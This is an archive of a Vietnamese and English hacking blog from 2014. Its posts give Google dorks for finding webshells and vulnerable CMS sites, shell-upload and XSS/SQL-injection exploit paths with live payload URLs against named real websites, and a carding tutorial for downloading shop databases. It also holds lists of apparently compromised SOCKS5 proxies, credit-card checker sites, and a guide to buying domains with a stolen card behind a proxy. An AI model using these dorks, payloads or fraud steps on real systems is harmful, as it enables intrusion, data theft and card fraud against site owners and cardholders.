Friday, July 25, 2014


1-Footholds


*Google search: intitle:"WSO 2.4" [ Sec. Info ], [ Files ], [ Console ], [ Sql ], [ Php ], [ Safe mode ], [ String tools ], [ Bruteforce ], [ Network ], [ Self remove
Submited: 2014-01-03



*Google search: intitle:"=[ 1n73ct10n privat shell ]="
Submited: 2014-01-03



*Google search: filetype:php intext:"!C99Shell v. 1.0 beta"
Submited: 2013-11-25



*Google search: intitle:"uploader by ghost-dz" ext:php
Submited: 2013-11-25

Monday, July 21, 2014

Lan Hack With dSploit On Android


SQL 2014 DORK

SQL 2014 DORK SQL DORK 2014

  Nguồn: CEH
trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=

Saturday, July 19, 2014

Exploit Joomla!: JCE



It has been a very long time that i haven't post here, so as for today i'm going to post a new tutorial on how to upload shell with method JCE.




Thing Required:

JCE Exploiter : DOWNLOAD




DORKS:


inurl:"images/stories" php
"index of /images/stories/powered_by.png"
"index of /images/stories/joomla-dev_cycle.png"
"index of /images/stories/food"
"index of /images/stories/fruit"
inurl:"/images/stories/food"

Exploit WordPress: Optin Pro - File Upload Vulnerability

Once again, i'm not gonna explain anything about this exploit since it is exactly the same as my previous post. So, i'm just gonna give you the dork and exploit.

DORK: inurl:/wp-content/uploads/svp/headerimage/
inurl:/wp-content/plugins/wp_optin_pro/

EXPLOIT:/wp-content/plugins/wp_optin_pro/media-upload.php

SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php

Espacio Ecuador XSS & SQLI



Dork:

intext:"developed by Espacio Ecuador"


Exploits:

http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>


Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27


XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


Pej Studio & Nissi Infotech & Plante Graffix - XSS



Dork:

intext:"Created By Nissi Infotech"


Exploits:

http://target.com/name.php?id= [XSS & SQLI]


Live Demo:

http://www.jayapriya.com/realestate/projectdetail.php?id=42%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

MyBB Kingchat - XSS



Dork:

inurl:/kingchat.php?


Exploit:

/kingchat.php?notic


Change that /... into this to see exploit:

/kingchat.php?chat=2&l=2


Then add your scripts...

Live Demo:

http://www.embargoedchat.co.uk/kingchat.php?chat=2&l=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


Pro-Service - XSS Vulnerability



Dorks:

intext:"Pro-Service" inurl:"/resume_list.php?id="
intext:"Pro-Service"


Exploit:

/resume_list.php?id=


Live Demo:

http://www.staff.ge/resume_list.php?id=2%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Posted in: NEXUS.PRO.XSS

Joomla Aclassif - XSS



Dork:

inurl:"index.php?option=com_aclassif"


Exploit:

/index.php/component/aclassif/?


Example & Live Demo:

http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Joomla Collector Shell Uploader



Dork:

inurl:index.php?option=com_collector


Exploit:

/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1


Live Demo:

http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

ProActive CMS - XSS



Dork:

intext:"Powered by Proactive CMS"


Exploit:

/admin.php?action=newuser (XSS)


Live Demo:

http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Noname - Media - XSS



Dork:

intext:"powered by www.noname-media.com" inurl:"/view.php?id="


Exploit:

/view.php?id=


Live Demo:

http://www.rws-e.de/php/galerie/view.php?id=4&next=1&categorie=3%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Cách xử lí khi lỡ quên mật khẩu router

Nếu không biết hoặc lỡ quên mật khẩu truy cập của bộ định tuyến (router), bạn có thể tìm và thiết lập lại bằng những cách sau.
Các bộ định tuyến hiện nay đều được truy xuất qua giao diện web và có tính năng bảo vệ bằng mật khẩu, trong đó, bạn có thể cấu hình các thiết lập kết nối mạng, kiểm soát của phụ huynh và chuyển tiếp cổng kết nối. Các mật khẩu mặc định này có thể được thay đổi để bảo vệ các thiết lập của bộ định tuyến.


Các bộ định tuyến hiện nay đều được truy xuất qua giao diện web và có tính năng bảo vệ bằng mật khẩu.


Tìm tên đăng nhập và mật khẩu mặc định của bộ định tuyến

Wednesday, July 9, 2014

Sock 5 Vip!! (9/7/2014)

103.247.157.3:16585
108.48.107.135:44414
109.67.169.50:8174
110.143.72.198:47235
111.94.197.159:6195
153.196.245.116:11803
166.159.133.167:22416
173.17.164.188:52133
173.23.165.114:35319
178.57.160.220:40045
185.22.18.62:59339
186.19.150.247:3945
193.110.219.32:24277
193.248.164.57:19731

Monday, July 7, 2014

Sock 5 Vip!! (7/7/2014)

1.36.186.217:55102
103.247.157.3:8286
140.114.93.136:443
142.196.192.133:20516
146.115.155.232:22724
172.242.214.14:15728
173.54.97.239:31609
173.63.189.226:49876
173.81.122.168:49194
174.110.162.157:24982
174.64.169.104:45730
176.36.68.60:20222
177.35.211.203:58200
188.136.132.18:443

Sunday, July 6, 2014

Sock 5 Vip!! (6/7/2014)

1.36.186.217:14720
100.0.104.180:34840
108.56.173.183:45021
121.209.173.112:32139
173.170.225.211:28769
173.63.189.226:39706
174.130.155.244:18337
178.216.3.134:33602
190.90.193.202:443
198.50.136.217:60088
199.193.153.72:3308
201.20.110.58:443
203.45.59.17:5987

Friday, July 4, 2014

Sock 5 Vip!! (4/7/2014)

119.231.131.26:47145
176.62.4.149:42363
178.248.82.86:14525
185.16.102.50:33701
185.16.102.50:57150
185.16.102.50:59077
188.26.122.252:43231
194.247.12.11:5791
194.247.12.11:5823
194.247.12.11:5847
194.247.12.11:5853
198.50.136.217:60088
204.116.27.155:35846
211.167.76.180:45372
24.1.9.252:40663
24.130.134.103:26929
46.165.193.67:6211
46.165.193.67:7529
46.165.193.67:7719
46.38.51.49:6147
46.38.51.49:6927
5.9.212.53:9544
60.34.190.139:7651
61.64.114.113:13952
67.49.90.215:3291
69.146.52.180:17621
75.179.9.177:37900
76.117.10.123:35344
76.184.212.177:17215
77.242.22.254:8741
78.61.105.77:52755
80.100.43.142:51325
80.86.106.110:1010
81.0.240.113:9050
82.66.128.242:40313
85.17.30.89:8252
91.185.215.141:5049
96.27.131.71:33819
97.80.60.62:25628

Thursday, July 3, 2014

MachForm Remote Shell Upload

=======================================================# [~] Exploit Title: MachForm RFU Bug
# [~] Google Dork (For RFU) : " Bottom Of The Exploit "
# [~] Date: 09/11/2012 (TU)
# [~] Exploit Author: Samim.s
# [~] Version: ALL Versions & ALL Languages
# [~] Tested on: Se7en & BT5
# [~] Support WebSite : MachForm.com
=======================================================
# [+] RFU Exploit :

Namo WebEditor v5.0 Remote File Uploader


Dork:

inurl:/module/upload_image/

Example :


http://www.akcse.org/bbs/lib/module/upload_image/upform.phphttp://www.cgoa.ca/_new/bbs/lib/module/upload_image/upform.phphttp://luxbellate.com/mart/bbs/lib/module/upload_image/upform.phphttp://run.ksilbo.co.kr/bbs/bbs/lib/module/upload_image/upform.php

Tuesday, July 1, 2014

Sock 5 Vip!! (1/7/2014)

100.40.39.221:25351
139.130.180.93:42280
142.196.192.133:49723
162.156.150.39:38125
162.243.105.128:6170
173.167.143.29:42014
174.54.165.206:32093
184.1.104.81:16524
186.19.150.247:12637
188.219.199.250:5927
193.33.65.167:6947
194.247.12.11:6714

[ADD ONS] Hacker ToolKit For Google Chrome

1- Web Developer

Web Developer is a Google Chrome extension that adds a tool bar with various web development tools in Chrome. With these tools, users can perform various web development tasks. This extension helps analyzing web application elements like HTML and JS.

Monday, June 30, 2014

Carding Tutorial - PDShopPro Shopping Cart

Dork:
allinurl:/shop/category.asp?catid=

Steps:
1- Copy and paste the dork on Google
2- Choose any site
3- For example, your site is 
 www.example.com/shop/category.asp?catid=2
4- Remove /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp and you will see some thing like this.

 

5- If you get something like this, that's mean the site is vulnerable.
6- Now, continue our next step by replacing /admin/dbsetup.asp with /data/pdshoppro.mdb

Exploit eggBlog 414 Arbitrary File Upload


Dork:
"powered by eggBlog.net"

Exploit : 
/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=

Remote File Inclusion [RFI] Dorks




/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=

Exploit Wordpress : fbconnect SQL Injection Vulnerability

Dork:
inurl:"fbconnect_action=myhome"

Exploit: 

Shop737 - File Upload Vulnerabilities

Finding Vulnerable Target

Dork:
intext:"Powered by Shop737"

1- Copy and paste this dork on Google.

2- Choose any site as your target.

3- Once you clicked on your target, you will see something like this,




Exploit Elfinder - Shell Upload Vulnerability



Dork:
                        inurl:'elfinder.php.html'
inurl:'elfinder.html'

Sunday, June 29, 2014

Moxiecode File Browser - An Uploading Vulnerability

Hi guys, I'm the new guy has just come to this blog :) This will be my first post on this blog...

An uploading vulnerability that you can upload files :)

PHP Remote - File Uploading Vulnerability

Dork:
inurl:”cadastro.php?TipodeConta=
Choose any sites... This form will be appeared :

Spaw Uploader (Vulnerability)

Dork:
inurl:”spaw2/uploads/files/”

Change spaw2/uploads/files/ to:

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Live Demo:

http://www.tieca.com/backoffice_tieca/spaw2/uploads/files/Crash_Hydra_Skull.html


Bảo vệ Website bằng .htaccess !!!

Có khá nhiều tài liệu về .htaccess. Cái này tôi chỉ update thêm cho các tài liệu đó.

1. .htaccess là gì?

1.1. .htaccess là gì


.htaccess là một file cấu hình sử dụng cho các web server chạy Apache. .htaccess dùng để thiết lập các tùy chọn: thực thi hay loại bỏ các chức năng, tính năng của Apache

1.2. Ý nghĩa ký hiệu định nghĩa trong .htaccess

Friday, June 27, 2014

Sock 5 Vip!! (27/06/2014)

109.251.74.247:21723
166.78.137.15:46907
173.24.67.160:31197
178.171.36.104:14932
187.189.119.243:13909
190.254.163.158:26894
190.90.193.202:443
198.50.136.217:60088
207.183.232.242:41916
211.167.76.180:45372
221.214.214.187:11180
24.211.165.13:52449
24.227.33.82:48064
24.234.245.37:49327
24.47.57.4:23318
61.147.67.2:9123
65.25.3.26:54790
65.27.113.74:33117
65.28.48.177:44307
66.137.224.128:25028
66.30.76.140:43738
68.144.54.142:22223
69.251.81.230:54455
69.68.129.61:20376
70.166.136.165:45077
75.128.223.139:18789
75.167.78.51:50212
75.99.187.138:35822
76.112.48.14:28314
77.242.22.254:8741
78.39.178.2:443
80.114.179.158:32501
80.62.217.19:9100
86.38.220.80:44424
98.117.63.101:32095
98.145.67.82:48271
98.213.60.209:50142
98.236.230.54:37445

Wednesday, June 25, 2014

Sock 5 Vip! (25/06/2014)

114.26.208.76:6238
123.30.188.46:2214
172.242.214.14:17698
173.93.169.207:48581
174.54.103.213:43615
184.90.146.71:32637
185.4.29.169:443
199.193.153.72:3308
199.201.126.67:443
211.100.47.140:7098
213.250.211.130:52427
217.219.169.48:443
217.66.27.149:2379
219.147.172.2:12345
221.214.214.187:11180
222.240.175.79:8580
24.242.107.191:28304
24.32.119.168:47657

Tuesday, June 24, 2014

Website Decode PHP Chuẩn

Tìm được cái trang này chuyên decode các loại mã hóa PHP, thấy nó được chuẩn bị rất tốt và có khả năng giải mã những file php bị mã hóa đủ kiểu, đã test thử với hầu hết các con shell được mã hóa của rất nhiều thành viên thì tỉ lệ thành công gần như trên 95% nên bạn nào có nhu cầu thì vào sài ké nó nhé: http://www.unphp.net/

Sock 5 Vip !!(24/06/2014)

1.36.186.217:6923
103.247.157.3:35389
119.247.168.8:10119
121.150.193.39:19942
140.117.163.142:52848
142.255.77.162:47731
169.130.9.90:51362
173.23.165.114:28358
174.60.216.175:30947
178.150.134.218:45360
184.20.121.129:12497
190.112.101.139:7880
193.136.60.26:443
194.247.12.11:9335
194.247.12.11:9614
199.191.120.205:49073
199.201.126.67:443
201.26.63.135:20607

Monday, June 23, 2014

BẢO MẬT HƠN CHO PASSWORD – WEB PROGRAMER



Hiện nay, nhiều bạn học lập trình rất giỏi, cực kì xuất sắc nữa là khác, nhưng các bạn đó có bao giờ chú ý để việc đặt 1 password sao cho BẢO MẬT.
- Thú thật, khi mình khai thác sqli, nhiều site đặt password chẳng mã hóa lun, chắc điều này các bạn cũng biết nhỉ????

- Một số khác, lại mã hóa cái password ấy, nhưng cực kì sơ sài, bởi vì, họ chỉ quan tâm tới vẻ bên ngoài sao cho bắt mắt, đẹp và … chạy được, nhưng đó lại là sự thật

vd 1 cách đặt pass phổ biến như:


$password = md5($_POST["pass"]);

Facebook Comment's Picture Hijacking

Link: http://1337day.com/exploit/20915

Description:
Today Facebook rollouts for FB users to comment with picture on any status. But the feature has a bug which allows malicious user to hijack the picture from any comments if the picture is share by uploading for comment.

After Malicious user hijack the picture, malicious person can change picture description as well as delete the picture.

Let's get started! all you need are status ID and victim's uploaded picture for comment ID.

Once you have both, we can simply comment on any status with that uploaded picture iD with the help of little javascript or you can use tampa data (attached_photo_fbid) to post with comment picture ID.

-----Javascript Facebook Picture Hijack PoC----

var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID

Sock 5 Vip!! (23/06/2014)

100.42.168.86:6629
108.167.78.172:35208
108.34.170.52:22251
109.67.132.133:44468
109.73.216.94:32251
114.80.136.222:7780
122.118.111.130:5127
140.116.109.79:10113
141.135.111.233:5813
142.255.77.162:47731
162.243.105.128:6170
173.12.63.13:43952
173.14.92.165:15761

Sunday, June 22, 2014

Sock 5 Vip!!(22/06/2014)



108.184.81.152:48391

109.90.187.154:35936

114.77.93.197:45824

114.80.136.222:7780

118.167.30.108:16107

159.224.60.200:31846

173.0.193.172:40696

173.202.218.33:40098

Thursday, June 19, 2014

CCV Checker

http://ccplex.info/
http://tool.shop4key.com/webtools/tool/checkccv/ccvgate12/
http://ug4all.com/
https://ug-market.com

Sock 5 Vip (19/06/2014)

108.16.204.170:25763
108.38.139.100:51868
114.80.136.222:7780
173.202.218.33:45570
173.221.160.2:19349
173.23.165.114:18445
173.24.67.160:40520
173.61.194.56:45235
174.109.105.154:44252
174.126.40.91:20842
174.64.169.104:45730
176.36.68.60:20222

Wednesday, June 18, 2014

Hướng dẫn reg domain Không bị die

Tut này hd các bạn reg domain yahoo.
Trước tiên các bạn cần chuẩn bị (socks 5 + 1 CC lived)
sau khi có đủ socks và cc rồi các bạn tiến hành các bước như sau:
bước đầu tiên là fake ip sau khi có một con socks có dạng : 24.174.91.226:54179 
Nếu dùng IE các bạn làm như sau:

Quote:
các bạn vào IE rồi vào tool
sau đó click vào Internet Option...
Tiếp theo để clear hết cookie để % order tỷ lệ live domain cao hơn các bạn có thể click vào deletel cookie và deletel file
Sau khi clear cookie xong vào fake IP các bạn click vào Connextion>Lan Setting>Đánh dấu vào Proxy server
chọn Advanced
Phần socks các bạn gõ ô ở bên trái là 24.174.91.226 và ô ở bên phải là 54179 sau khi fake ok rồi các bạn có thể vào http://ip2location.com để kiểm tra địa chỉ ip của mình.Nếu là US thì OK
Còn với những ai thích dùng firefox hơn thì làm như sau:

35 website học lập trình web

Tự học lập trình có khó không? Điều mà chúng ta sợ nhất khi tự học Online có lẽ là sợ sai rồi "code đứng cứng ngắc" mò hoài chẳng ra -> nản -> bỏ. Hỏi thì chẳng biết hỏi ai, hỏi cái dễ quá thì sợ bị khinh. Tuy nhiên, bạn hãy tự tin vào việc học Online, bởi danh sách website này có giáo trình hợp lí chia theo từng bài, từng phần từ thấp đến cao, nguồn bài phong phú, giao diện và thao tác học đơn giản, tương tác sâu. Với những website này thì bạn có thể đi từ cơ bản đến nâng cao với rất nhiều loại ngôn ngữ lập trình và nền tảng. Còn cái nữa là học online thì giáo trình và kỹ thuật bảo đảm mới và cập nhật hơn nhiều so với giáo trình trong trường lớp. Tham khảo nhé! 

W3Schools

Dừng chân đầu tiên của danh sách nguồn Online để học lập trình là W3Schools, bởi sự phổ biến và tính hữu ích của nó. Thêm vào đó, khi trao đổi với nhiều lập trình viên mà tôi quen thì W3Schools luôn là nguồn mà họ hay nhắc đến khi nói về nơi để học lập trình.